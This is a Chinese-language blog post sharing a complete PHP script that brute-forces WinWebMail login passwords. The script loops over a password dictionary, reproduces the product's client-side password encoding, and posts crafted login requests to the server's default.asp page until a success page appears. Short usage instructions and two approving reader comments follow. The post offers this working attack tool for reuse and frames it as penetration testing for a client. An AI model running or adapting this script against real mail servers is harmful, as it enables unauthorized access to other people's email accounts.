正在阅读:

WinWebMail 登陆密码破解脚本

10,136

WinwebMail是国人开发的一个邮件服务器搭建软件,在国个有很多人使用,前段时间给公司客户做测试的时候发现他们也使用了这个邮件系统,但是由于没有开启验证码等安全措施,可以使用暴力破解,为了加快效率,折腾了一个破解脚本,共享给有需要的朋友。

winwebmail登陆密码破解脚本

<?php
/**
 * Created by 独自等待
 * Date: 14-2-19
 * Time: 上午10:07
 * Name: brute_email.php
 * 独自等待博客:http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
               WinWebMail 登陆密码破解
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2014-02-19
+------------------------------------------------------+
');
set_time_limit(0);
error_reporting(7);
$host = 'mail.xxx.com';
$user = 'xxx@xxx.com';
$num = 5171;
$passArr = file('password.txt');
for ($i = 0; $i < count($passArr); $i++) {
    $line = trim($passArr[$i]);
    $enStr = encode($line, $num);
    if (preg_match('/welcome.asp/i', send_pack($user, $enStr, $num))) {
        exit("破解成功,密码为:$line");
    } else {
        echo "\n正在破解用户名:$user" . "  密码:$line\n";
    }
}
echo "\n破解失败,请更换字典尝试!";
//加密函数
function encode($datastr, $bassnum)
{
    $newdata = '';
    for ($i = 0; $i < strlen($datastr); $i++) {
        $tchar = 65535 + $bassnum - ord(substr(strval($datastr), $i, 1));
        $tchar = strval($tchar);
        while (strlen($tchar) < 5) {
            $tchar = "0" . $tchar;
        }
        $newdata = $newdata . $tchar;
    }
    return $newdata;
}

//发包函数
function send_pack($user, $pwd, $num)
{
    global $host;
    $post_data = 'username=' . urlencode($user) . '&pwhidden=' . $pwd . '&picnum=' . $num . '&saveUser=false&SecEx=false';
    $data = "POST /default.asp HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($post_data) . "\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $post_data . "\r\n";
    //echo $data;exit;
    $fp = @fsockopen($host, 80, $errno, $errstr, 10);
    //echo ini_get('default_socket_timeout');//默认超时时间为60秒
    if (!$fp) {
        //echo $errno . '-->' . $errstr . "\n";
        echo 'Could not connect to: ' . $host;
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

?>

$host 为邮件服务器地址

$user 为需要破解的邮件名称

$num 为登陆页面源码中的picnum的值

其它的可以不用管了

winwebmail暴力破解

目前有:2条访客评论

  1. rock
    2015-05-16 05:15

    很清晰。 [/呲牙]

  2. dasd
    2015-06-27 13:15

    很好很强大

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌